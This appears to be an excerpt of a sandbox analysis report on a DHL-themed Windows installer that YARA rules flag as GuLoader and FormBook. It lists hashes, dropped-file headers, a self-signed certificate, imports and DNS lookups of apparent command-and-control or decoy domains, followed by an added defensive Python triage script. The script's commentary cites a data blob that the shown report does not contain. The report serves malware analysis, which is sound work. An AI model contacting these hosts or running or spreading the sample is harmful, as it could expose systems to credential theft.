                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........<.....&".....R..........0..........h.....................................^........ .................................................................................`...............................(....................................................text...HP.......R..................`.P`.data........p.......V..............@.P..rdata...............X..............@.`@.pdata...............b..............@.0@.xdata...............j..............@.0@.bss.... .............................`..edata...............r..............@.0@.idata...............v..............@.0..CRT....X............~..............@.@..tls................................@.@..reloc..`...........................@.0B........................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):130344
                                                                    Entropy (8bit):6.2622011397185
                                                                    Encrypted:false
                                                                    SSDEEP:3072:tKInqqVjbm+1Vi5R6QQU7k1TAH1OobTrWHEE+jFpCOx:tVzjvi5R6QQU7k1TAH1OobTrWHExFpdx
                                                                    MD5:2455841538BA8A502398C18781CC3CEB
                                                                    SHA1:86CFD513FEE46EBC2C35225B27372679BE6ADA91
                                                                    SHA-256:F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
                                                                    SHA-512:BC1DCDDE074150616DED7EAACC3FC44BDD2487EB5E550172F5EA46432AA76F19443A9FD6CEF61577B7803C1B083FFCBCEAF9ADC3114A97B547A78C2654F757E3
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"....."....................\d.............................P......z.....`... .................................................X....0..................x....@.............................. ..(.......................P............................text...8!......."..................`.P`.data........@.......&..............@.`..rdata...^...P...`...(..............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..X...........................@.0..CRT....X...........................@.@..tls....h.... ......................@.`..rsrc........0......................@.0..reloc.......@......................@.0B................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):227256
                                                                    Entropy (8bit):6.388677533277947
                                                                    Encrypted:false
                                                                    SSDEEP:6144:ue/rKQgYva3o4vj272BNvIJuQlf2qIHL2:uYrK4a3PvKw7ufg2
                                                                    MD5:49A2E97304EF8E044EEBD7ACCAD37E11
                                                                    SHA1:7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A
                                                                    SHA-256:83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
                                                                    SHA-512:AC206C5EF6F373A0005902D09110A95A7F5FB4F524653D30C3A65182717272FE244694A6698D40884BEA243B2CA00D7741CED796DF7AE8C633F513B8C6FCD6C8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...J..b.........."......:.....................@....................................Y.....`..................................................................`..h....X..........................................(....P..............(...h............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data....!...0......................@....pdata..h....`.......*..............@..@.00cfg...............D..............@..@.tls.................F..............@....rsrc................H..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\cscript.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):122880
                                                                    Entropy (8bit):1.1305327154874678
                                                                    Encrypted:false
                                                                    SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                    MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                    SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                    SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                    SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.854901984552606
                                                                    Encrypted:false
                                                                    SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                    MD5:0063D48AFE5A0CDC02833145667B6641
                                                                    SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                    SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                    SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.477730016942703
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:DHLIN00178.exe
                                                                    File size:888192
                                                                    MD5:66fdf2df4fc8601124df76c284f797e1
                                                                    SHA1:88031f2f9bfbf3eb0b069c68fd4ed4ee288daf9f
                                                                    SHA256:e07a149d14fc37367e7331342d07dc45aec9ef7bbce780ea636c5d04f6c26f3f
                                                                    SHA512:a1fc53925d4fd04a81d2d7dc8bb26ed15fef14e9cd38945fbba55ef7b67a13b67c9527ed7c5388f9ed9013c287df67f343248bb4261838f389d34f42959c3720
                                                                    SSDEEP:12288:AwFjJnKlHcG+glWs89TbTjb8E5UcKcZnY4UKwp7hVOZCbgjvwhaD:A6jklHcGtlF89TbfccUNEZCbgjV
                                                                    TLSH:4715CFD7B845528CE9B99EB3712B1C2213701FBA662C104D76CC329D09FD1627EDE86E
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................`..........52.......p....@
                                                                    Icon Hash:6e8d166f696a6661
                                                                    Entrypoint:0x403235
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC] (for a Nullsoft self-extracting archive the PE header is the NSIS stub, so this is the stub's link time rather than when the payload was packaged; it also predates the signing certificate's validity period below)
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:e9c0657252137ac61c1eeeba4c021000
                                                                    Signature Valid:false
                                                                    Signature Issuer:E=Misbehadden@Anstdsstenenes.Sta, OU="Seksdageslb Tredjebehandles ", O=Konfirmeres, L=Bondues, S=Hauts-de-France, C=FR
                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider (the issuer is identical to the single subject below, i.e. the sample is self-signed with a throwaway certificate)
                                                                    Error Number:-2146762487 (HRESULT 0x800B0109, CERT_E_UNTRUSTEDROOT)
                                                                    Not Before:27/05/2022 07:04:34
                                                                    Not After:26/05/2025 07:04:34
                                                                    Subject Chain
                                                                    • E=Misbehadden@Anstdsstenenes.Sta, OU="Seksdageslb Tredjebehandles ", O=Konfirmeres, L=Bondues, S=Hauts-de-France, C=FR
                                                                    Version:3
                                                                    Thumbprint MD5:EF5809104A07E21FDB714DE7D3F4CB3B
                                                                    Thumbprint SHA-1:E5B83F0AF141BAF75894E4585A5133459235BDBF
                                                                    Thumbprint SHA-256:AC8EC8BCA9EDDE54EDCCFD81C53BCAB60DEB5C8F53E2C46EB232990CA73252D7
                                                                    Serial:7D95432F108C131FEDA31C4FE788119FC24ED14C
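The following script is an added example and not part of the Joe Sandbox report or its tooling. It re-implements, in plain Python with no third-party packages, the static checks behind the fields above and in the dropped-file tables: the 8-bit Shannon entropy column, the COFF/optional header fields (link timestamp, entry point, file and DLL characteristics), the conversion of the signed "Error Number" into the Windows HRESULT it encodes, a self-signed test on issuer versus subject, and the comparison of the link timestamp with the certificate's Not Before date. The PE header it parses is a constructed minimal PE32 header that mirrors the report's values, not the sample itself; the function and constant names are the example's own.

```python
"""Static triage helpers for the PE / signature fields of a sandbox report (added example)."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# Subset of IMAGE_FILE_* and IMAGE_DLLCHARACTERISTICS_* bits (names as the report prints them).
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def decode_flags(value: int, table: dict) -> list:
    """Names of the set bits, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_header(data: bytes) -> dict:
    """Read the COFF and optional header fields the report prints (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, _nsect, timestamp, _, _, _opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:    # PE32: 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:  # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)  # same offsets for PE32/PE32+
    return {
        "machine": machine,
        "timestamp": timestamp,
        "link_time": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "image_base": image_base,
        "entrypoint": image_base + entry_rva,  # report prints the VA, e.g. 0x400000 + 0x3235
        "subsystem": subsystem,
        "characteristics": decode_flags(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": decode_flags(dll_chars, DLL_CHARACTERISTICS),
    }


def hresult(error_number: int) -> int:
    """The report prints HRESULTs as signed 32-bit ints; -2146762487 is 0x800B0109 (CERT_E_UNTRUSTEDROOT)."""
    return error_number & 0xFFFFFFFF


def parse_report_date(text: str) -> datetime:
    """Parse the 'DD/MM/YYYY HH:MM:SS' form used for certificate validity (treated as UTC)."""
    return datetime.strptime(text, "%d/%m/%Y %H:%M:%S").replace(tzinfo=timezone.utc)


def is_self_signed(issuer: str, subject: str) -> bool:
    """A one-element chain whose issuer equals its subject is self-signed."""
    return issuer.strip() == subject.strip()


def timestamp_predates_cert(link_time: datetime, not_before: datetime) -> bool:
    """True when the PE link time is earlier than the certificate's validity start.
    Caveat: link timestamps are trivially forged, and an NSIS installer carries the
    stub's timestamp, so treat this as a weak signal, not proof."""
    return link_time < not_before


def build_constructed_pe32() -> bytes:
    """Constructed minimal PE32 header mirroring the report's header fields (not the sample)."""
    hdr = bytearray(0x40 + 4 + 20 + 0xE0)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)            # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x014C, 5, 0x5DF6D4E3, 0, 0, 0xE0, 0x010F)
    opt = 0x44 + 20
    struct.pack_into("<H", hdr, opt, 0x10B)            # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x3235)      # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", hdr, opt + 28, 0x400000)    # ImageBase
    struct.pack_into("<HH", hdr, opt + 40, 4, 0)       # OS version 4.0
    struct.pack_into("<HH", hdr, opt + 68, 2, 0x8540)  # WINDOWS_GUI, DLL characteristics
    return bytes(hdr)


if __name__ == "__main__":
    h = parse_pe_header(build_constructed_pe32())
    print(h["link_time"], hex(h["entrypoint"]), h["characteristics"], h["dll_characteristics"])
    print("HRESULT 0x%08X" % hresult(-2146762487))
    print("predates cert:", timestamp_predates_cert(h["link_time"], parse_report_date("27/05/2022 07:04:34")))
```

Run against the real dropped files, `shannon_entropy(open(path, "rb").read())` reproduces the report's entropy column; values near 7.3 and above on PE payloads (as for the 260228-byte "data" blob above) are what a packer or encrypted payload looks like, while the SQLite database at 1.13 is mostly empty pages. The header parser stops at the optional header on purpose: it is enough to confirm the entry point, timestamp and flag fields printed above without trusting them, and anything deeper (sections, imports, the Authenticode blob) belongs to a full PE parser.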
Programming Language: [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7430 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0x34260 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd6b18 | 0x2268 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x294 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5f7d | 0x6000 | False | 0.6680094401041666 | data | 6.466064816043304 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x123e | 0x1400 | False | 0.4275390625 | data | 4.989734782278587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a818 | 0x400 | False | 0.638671875 | data | 5.130817636118804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x12000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x36000 | 0x34260 | 0x34400 | False | 0.20456414473684212 | data | 4.299804646716883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x36208 | 0x33828 | Device independent bitmap graphic, 199 x 512 x 32, image size 203776, resolution 3779 x 3779 px/m | English | United States
RT_DIALOG | 0x69a30 | 0x100 | data | English | United States
RT_DIALOG | 0x69b30 | 0x11c | data | English | United States
RT_DIALOG | 0x69c50 | 0xc4 | data | English | United States
RT_DIALOG | 0x69d18 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x69d78 | 0x14 | data | English | United States
RT_VERSION | 0x69d90 | 0x190 | data | English | United States
RT_MANIFEST | 0x69f20 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll | GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll | SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system: English
Country where language is spoken: United States
                                                                    Mar 17, 2023 21:42:04.725537062 CET192.168.11.201.1.1.10x9ba6Standard query (0)www.daon3999.netA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:05.741060972 CET192.168.11.209.9.9.90x9ba6Standard query (0)www.daon3999.netA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:21.425585985 CET192.168.11.201.1.1.10xc8caStandard query (0)www.5319ss.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:35.609678030 CET192.168.11.201.1.1.10xef7bStandard query (0)www.riverflow.netA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:48.576221943 CET192.168.11.201.1.1.10xe4b8Standard query (0)www.verde-amar.infoA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Mar 17, 2023 21:37:33.046544075 CET1.1.1.1192.168.11.200x7fcbNo error (0)machupichuturismo.com162.213.255.18A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:18.725651026 CET1.1.1.1192.168.11.200xc897No error (0)www.sandyhillsagritourism.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:18.725651026 CET1.1.1.1192.168.11.200xc897No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:18.725651026 CET1.1.1.1192.168.11.200xc897No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:34.203830957 CET1.1.1.1192.168.11.200xb713No error (0)www.sem-jobs.com85.13.156.177A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:46.928004026 CET1.1.1.1192.168.11.200x2334No error (0)www.casinoenligne-france.info3.9.182.46A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)www.37123.vipehbw3ftr-u.funnull01.vipCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)ehbw3ftr-u.funnull01.vipu4tgw7dr.n.funnull35.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)u4tgw7dr.n.funnull35.com103.20.61.209A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)u4tgw7dr.n.funnull35.com103.20.61.210A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)u4tgw7dr.n.funnull35.com103.20.61.207A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:14.119550943 CET1.1.1.1192.168.11.200xa56cNo error (0)www.adasoft.infoadasoft.infoCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:14.119550943 CET1.1.1.1192.168.11.200xa56cNo error (0)adasoft.info81.88.48.71A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:26.986928940 CET1.1.1.1192.168.11.200xcfeNo error (0)www.hhkk143.cfd188.114.96.3A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:26.986928940 CET1.1.1.1192.168.11.200xcfeNo error (0)www.hhkk143.cfd188.114.97.3A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:39.985469103 CET1.1.1.1192.168.11.200x4b01No error (0)www.popcors.compopcors.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:39.985469103 CET1.1.1.1192.168.11.200x4b01No error (0)popcors.com173.230.227.171A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:53.192972898 CET1.1.1.1192.168.11.200x4dd1No error (0)www.spotcheck.site199.192.30.193A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:07.026993990 CET1.1.1.1192.168.11.200xd571No error (0)www.dinggubd.net38.163.2.19A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:21.207340002 CET1.1.1.1192.168.11.200x2a07No error (0)www.hot6s.com104.21.8.203A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:21.207340002 CET1.1.1.1192.168.11.200x2a07No error (0)www.hot6s.com172.67.157.215A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.020494938 CET1.1.1.1192.168.11.200x49efNo error (0)www.0w3jy.comhk.ygrcw.cnCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.020494938 CET1.1.1.1192.168.11.200x49efNo error (0)hk.ygrcw.cn164.88.122.250A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.353796959 CET9.9.9.9192.168.11.200x49efNo error (0)www.0w3jy.comhk.ygrcw.cnCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.353796959 CET9.9.9.9192.168.11.200x49efNo error (0)hk.ygrcw.cn164.88.122.250A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:51.192102909 CET1.1.1.1192.168.11.200xc593No error (0)www.cmproutdoors.com156.255.170.114A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.574141026 CET1.1.1.1192.168.11.200x9ba6No error (0)www.daon3999.netdaon3999.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.574141026 CET1.1.1.1192.168.11.200x9ba6No error (0)daon3999.net222.122.213.231A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.817251921 CET9.9.9.9192.168.11.200x9ba6No error (0)www.daon3999.netdaon3999.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.817251921 CET9.9.9.9192.168.11.200x9ba6No error (0)daon3999.net222.122.213.231A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:21.853430033 CET1.1.1.1192.168.11.200xc8caNo error (0)www.5319ss.comgy.adsfzcvx.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:21.853430033 CET1.1.1.1192.168.11.200xc8caNo error (0)gy.adsfzcvx.com154.210.212.94A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:35.920783997 CET1.1.1.1192.168.11.200xef7bNo error (0)www.riverflow.net64.190.63.111A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:48.607541084 CET1.1.1.1192.168.11.200xe4b8No error (0)www.verde-amar.info185.53.177.54A (IP address)IN (0x0001)false
                                                                    • machupichuturismo.com
                                                                    • www.sandyhillsagritourism.com
                                                                    • www.sem-jobs.com
                                                                    • www.casinoenligne-france.info
                                                                    • www.37123.vip
                                                                    • www.adasoft.info
                                                                    • www.hhkk143.cfd
                                                                    • www.popcors.com
                                                                    • www.spotcheck.site
                                                                    • www.dinggubd.net
                                                                    • www.hot6s.com
                                                                    • www.0w3jy.com
                                                                    • www.cmproutdoors.com
                                                                    • www.daon3999.net
                                                                    • www.5319ss.com
                                                                    • www.riverflow.net
                                                                    • www.verde-amar.info

Target ID: 1
Start time: 21:35:02
Start date: 17/03/2023
Path: C:\Users\user\Desktop\DHLIN00178.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\DHLIN00178.exe
Imagebase: 0x400000
File size: 888192 bytes
MD5 hash: 66FDF2DF4FC8601124DF76C284F797E1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.6092061877.000000000A021000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 5
Start time: 21:37:16
Start date: 17/03/2023
Path: C:\Users\user\Desktop\DHLIN00178.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\DHLIN00178.exe
Imagebase: 0x400000
File size: 888192 bytes
MD5 hash: 66FDF2DF4FC8601124DF76C284F797E1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
